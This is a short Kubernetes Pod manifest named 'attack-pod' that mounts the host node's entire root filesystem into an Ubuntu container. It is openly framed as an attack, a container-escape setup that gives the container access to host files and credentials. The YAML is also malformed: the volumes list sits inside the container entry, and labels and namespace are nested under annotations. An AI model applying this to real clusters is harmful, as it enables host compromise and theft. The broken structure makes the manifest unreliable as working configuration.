apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  annotations:
    labels:
    namespace: default
spec:
  containers:
  - image: ubuntu
    imagePullPolicy: IfNotPresent
    name: attack-container
    volumeMounts:
    - mountPath: /root
      name: mount-root-info-mnt
    volumes:
    - name: mount-root-info-mnt
      hostPath:
        path: /
